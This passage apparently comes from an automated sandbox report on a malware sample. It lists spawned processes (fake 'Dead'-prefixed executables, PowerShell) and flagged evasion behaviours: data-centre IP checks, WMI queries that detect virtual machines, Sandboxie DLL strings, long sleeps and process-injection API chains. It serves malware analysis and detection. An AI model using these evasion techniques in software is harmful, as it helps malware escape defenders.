                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Check if machine is in data center or colocation facility
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Contains functionality to compare user and computer (likely to detect sandboxes)
                          Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,6_2_0000000140001854
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.drBinary or memory string: SBIEDLL.DLLINFO
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeMemory allocated: 1A780000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeMemory allocated: 1A900000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeMemory allocated: 8D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeMemory allocated: 1A310000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1AD40000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: A20000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1AE80000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599421Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599293Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599133Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598741Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598568Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598440Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\DeadXClient.exeWindow / User API: threadDelayed 6514Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeWindow / User API: threadDelayed 3143Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeWindow / User API: threadDelayed 3804Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeWindow / User API: threadDelayed 5987Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3822Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5329Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8065
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1186
                          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8849
                          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1151
                          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9914
                          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9863
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9353
                          Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_6-7286
                          Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-8409
                          Source: C:\Users\Public\DeadCodeRootKit.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_3-244
                          Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_6-7290
                          Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-7236
                          Source: C:\Windows\System32\lsass.exeAPI coverage: 7.3 %
                          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.6 %
                          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.5 %
                          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.6 %
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe TID: 5164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadXClient.exe TID: 7384Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadXClient.exe TID: 7396Thread sleep count: 6514 > 30Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exe TID: 7396Thread sleep count: 3143 > 30Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599765s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599640s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599531s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599421s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599293s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -599133s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -598741s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -598568s >= -30000sJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344Thread sleep time: -598440s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep count: 3822 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep count: 5329 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\dllhost.exe TID: 7356Thread sleep count: 340 > 30Jump to behavior
                          Source: C:\Windows\System32\dllhost.exe TID: 7356Thread sleep time: -34000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\dllhost.exe TID: 6920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Windows\System32\winlogon.exe TID: 7420Thread sleep count: 8849 > 30
                          Source: C:\Windows\System32\winlogon.exe TID: 7420Thread sleep time: -8849000s >= -30000s
                          Source: C:\Windows\System32\winlogon.exe TID: 7420Thread sleep count: 1151 > 30
                          Source: C:\Windows\System32\winlogon.exe TID: 7420Thread sleep time: -1151000s >= -30000s
                          Source: C:\Windows\System32\lsass.exe TID: 7476Thread sleep count: 9914 > 30
                          Source: C:\Windows\System32\lsass.exe TID: 7476Thread sleep time: -9914000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 7484Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7552Thread sleep count: 241 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7552Thread sleep time: -241000s >= -30000s
                          Source: C:\Windows\System32\dwm.exe TID: 7600Thread sleep count: 9863 > 30
                          Source: C:\Windows\System32\dwm.exe TID: 7600Thread sleep time: -9863000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7644Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7644Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7664Thread sleep count: 251 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7664Thread sleep time: -251000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep count: 252 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep time: -252000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7680Thread sleep count: 247 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7680Thread sleep time: -247000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep count: 201 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -201000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7776Thread sleep count: 80 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7776Thread sleep time: -80000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep count: 82 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep time: -82000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7828Thread sleep count: 238 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7828Thread sleep time: -238000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7864Thread sleep count: 69 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7864Thread sleep time: -69000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7988Thread sleep count: 243 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7988Thread sleep time: -243000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8004Thread sleep count: 247 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8004Thread sleep time: -247000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep count: 243 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep time: -243000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep count: 251 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep time: -251000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8128Thread sleep count: 62 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8128Thread sleep time: -62000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8160Thread sleep count: 250 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8160Thread sleep time: -250000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8180Thread sleep count: 244 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8180Thread sleep time: -244000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8188Thread sleep count: 226 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8188Thread sleep time: -226000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7264Thread sleep count: 248 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7264Thread sleep time: -248000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7248Thread sleep count: 237 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7248Thread sleep time: -237000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7308Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7308Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6804Thread sleep count: 52 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 6804Thread sleep time: -52000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5820Thread sleep count: 53 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 5820Thread sleep time: -53000s >= -30000s
                          Source: C:\Windows\System32\spoolsv.exe TID: 6096Thread sleep count: 185 > 30
                          Source: C:\Windows\System32\spoolsv.exe TID: 6096Thread sleep time: -185000s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                          Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
